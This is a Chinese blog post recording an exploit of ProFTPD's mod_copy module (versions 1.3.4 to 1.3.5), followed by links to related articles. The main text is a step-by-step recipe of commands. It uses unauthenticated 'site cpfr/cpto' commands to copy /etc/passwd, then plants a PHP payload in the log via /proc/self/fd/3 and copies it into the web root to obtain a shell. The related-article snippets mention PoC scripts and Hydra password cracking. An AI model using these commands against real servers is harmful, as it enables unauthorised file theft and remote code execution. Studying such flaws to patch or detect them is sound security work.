proftpd的mod_copy模块未授权调用利用记录

最新推荐文章于 2024-01-12 14:55:51 发布
最新推荐文章于 2024-01-12 14:55:51 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 安全漏洞 文章标签: proftpd mod_copy proftpd漏洞

文章来源自《安全参考》第30期,略有改动

影响版本:

proftpd-1.3.4---proftpd-1.3.5

1.执行命令

nc x.x.x.x 21

2.执行 
site cpfr /etc/passwd
可以未授权状态复制文件


3.执行

site cpto /tmp/test
可将之前复制的/etc/passwd粘贴到/tmp/test


高级用法:

site cpfr /etc/passwd
site cpto <?php phpinfo(); ?> 
site cpfr /proc/self/fd/3
site cpto /var/www/test.php

原理:由于不存在<?php phpinfo(); ?>目录, 会产生一个错误的记录到/proc/self/fd/3下面,内容大概如下 

2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied

将文件复制到web目录下即可实现getshell


hrayha
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ProFTPD <=1.3.5 mod_copy 授权文件复制漏洞
weixin_33738578的博客
01-24 640
poc如下: #!/usr/bin/env python# coding=utf-8"""Site: http://www.beebeeto.com/Framework: https://github.com/n0tr00t/Beebeeto-framework"""import randomimport telnetlibfrom baseframe import BaseFramefrom ...
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&授权访问
ran的博客
05-09 2179
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSH、FTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞
cve-2015-3306复现
Yale的博客
04-02 3273
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何经身份验证的客户端都可以利用这些命令将文件文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
unable to connect to 192.168.3.193:5555: cannot connect to 192.168.3.193:5555: 由于连接方在一段时间后没有正确答复或连接
码蛋蛋
07-13 8699
概述 最近在开发自动售货机的项目,客户老是一会儿拿个十寸屏Android 4.0的机子来,一会儿拿个6寸屏Android5.0的机子来,由于开发这个项目需要调试,而且安卓平板又放在距离电脑远的地方,连接usb调试起来不太方便,所以只能采取使用wifi进行连接的方法来进行日志调试。 问题原因 原来手机的默认adb服务是没有打开的 解决方法 打开手机里面adb服务,请往下面看 ...
ProFTPD-1.3.3c Backdoor Command Execution漏洞复现+poc
开心星人的博客
11-27 955
https://blog.csdn.net/morrino/article/details/115836400 这个文章提供了一个部署1.3.3c版本的靶机。安装 https://blog.csdn.net/feelinghappy/article/details/106817434。https://www.exploit-db.com/exploits/15662 找到了存在后门的软件。在官网和官方github上找了一圈1.3.3c版本的proftpd,应该是漏洞太多,官方把下了。
proftpd-mod_dynamic_include:proftpd模块
04-27
mod_dynamic_include.c 描述 在登录阶段动态加载proftpd配置 用法 /etc/proftpd.conf LoadModule mod_dynamic_include.c DynamicIncludePath /etc/proftpd/%u.conf 格式规格 %u user name ( sent by 'USER' command...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/...
proftpd安装.rar
03-25
添加虚拟用户涉及创建数据库表,配置ProFTPD与数据库的连接,并在配置文件中启用虚拟用户模块,如`mod_vuser`。 7. **配置用户目录权限**: 用户的FTP访问权限可以通过配置文件来控制,例如指定用户的主目录、...
proftpd:ProFTPD源代码
01-30
ProFTPD 1.3.x自述文件 状态 介绍 ProFTPD是一个高度可配置的FTP守护程序,用于Unix和类似Unix的操作系统。 请参阅README.ports文件,以了解有关已知或认为在其上构建和运行ProFTPD的平台的更多详细信息。 ProFTPD...
linux proftpd-1.3.4c安装配置实例
09-15
在配置文件中,我们指定了只允许通过`mod_auth_file.c`模块认证的虚拟用户登录,并设置了认证文件的路径。这使得我们可以独立于系统用户管理FTP账户,提高了安全性。 ```conf AuthOrder mod_auth_file.c ...
proftpd 简介
04-08
 proftpd是一款开放源码的ftp服务器软件,它是原来世界范围使用最广泛的wu-ftpd的改进版,它修正了wu-ftpd的许多缺陷,在许多方面进行了重大的改进,其中一个重要变化就是它学习了Apache 的配置方式,使proftpd的配置和管理更加简单易懂。本文将介绍它在Red hat Linux AS4 中最基本的安装和配置。
4.10、漏洞利用-Proftpd、Mysql、Postgresql
c10udz的博客
11-23 824
proftpd的全称是Professional FTP daemon,类unix和unix平台FTP服务器程序,默认使用2121号端口,与vsftpd类似开源。 MySQL是关系型数据库管理系统,默认使用3306端口。关系数据库将数据保存在不同的表中;非关系型数据库,把数据存储到大的内存当中,而不是存储到大的表当中。postgresql(pg)是开源关系型数据库,最开始叫postgres,默认使用5432端口。
6-20漏洞利用-proftpd测试
山兔的博客
07-28 720
ProFTPD一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序http可以下载对应的版本,然后进行环境搭建。
Tryhackme - Kenobi (考点:ProFTPD 1.3.5 & nfs &环境变量提权)
冬萍子癸水
05-25 1065
1 扫描 21这个写了版本号ProFTPD 1.3.5,这就是可利用漏洞,可以进行拷贝复制敏感文件。 参考靶机symfonos2和joy 22可能有ssh登录 80进web信息搜集 139 445smb进去找敏感信息 2049开了nfs考虑挂载 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2
ProFTPD 截至1.3.5b 任意文件复制 CVE-2019-12815
最新发布
-
01-12 225
截至1.3.5b的ProFTPD中mod_copy中存在任意文件复制漏洞
字符串IP和Int类型之间的转换
weixin_42310934的博客
05-25 1517
1.如何把IP地址转换成Int类型的数据比如:192.168.10.233private static int iptran(String str){ String[] split = str.split("\\."); int i1 = Integer.parseInt(split[0]); int i2 = Integer.parseInt(split[1]); ...
错题集
weixin_49896746的博客
08-17 167
1.TCP/IP模型,及每层的常用协议名称? 网络接口层:MAC、RLC、BMC、PDCP 网络层:IP、ARP、RARP、IGMP、ICMP、 BGP、RIP 传输层:TCP、UDP、RTP、SCTP 应用层:HTTP、SMTP、SNMP、FTP、Telnet、SSH、NFS 2.OSI七层模型,描述每层的功能? 应用层:为应用程序提供网络服务。 表示层:数据格式标准化、加密、解密。 会话层:建立、维护、管理会话链接。 传输层:建立、维护、管理端到端的链接。 网络层:IP寻找和路由选择。 数据链路层:控制
ProFTPD 的 mod_lang模块
weixin_34289454的博客
07-09 349
ProFTPD 的 mod_lang模块http://www.proftpd.org/docs/modules/mod_lang.html安装该mod_lang模块ProFTPD一起分发。要在proftpd守护程序中启用NLS(自然语言支持),请使用 --enable-nlsconfigure选项:$ ./configure --enable-nls $ ma...
利用proftpd的mod_proxy模块实现ftp的反向代理
weixin_34268610的博客
10-19 269
公司内部有多个研发部门,每个研发部门都需要利用ftp来上传代码,但是外网地址只有一个,一开始我们采用的是利用haproxy加上代理主动端口来实现ftp的反向代理,但是这个方法有一个缺陷就是需要开放大量的主动端口,这样对于服务器的安全性就不是很好,后来找到proftpd的mod_proxy模块具备了类似于nginx的反向代理功能。我这里采用的是基于每个用户的反向代理,这要求每台ftp服务器都配置不同...
proftpd安装时安装相应模块怎么办,需要重新安装吗
06-09
如果您在安装 ProFTPD 时安装所需的模块,则可以通过安装相应的模块来解决该问题,而无需重新安装 ProFTPD。 首先,您需要确定您缺少哪些模块。您可以通过运行以下命令来查看已安装的模块列表: ``` proftpd -vv ``` 然后,您可以使用您的包管理器安装缺少的模块。例如,在 Ubuntu 上,您可以运行以下命令来安装 mod_sql 模块: ``` sudo apt-get install proftpd-mod-sql ``` 安装完成后,您需要编辑 ProFTPD 的配置文件以启用新安装的模块。配置文件通常位于 `/etc/proftpd/proftpd.conf`。您可以在文件中添加以下行来启用 mod_sql 模块: ``` LoadModule mod_sql.c ``` 请注意,这只是一个示例,您需要使用实际安装的模块名称替换 mod_sql。 最后,重新启动 ProFTPD 服务以使更改生效: ``` sudo service proftpd restart ``` 希望这可以帮助您解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值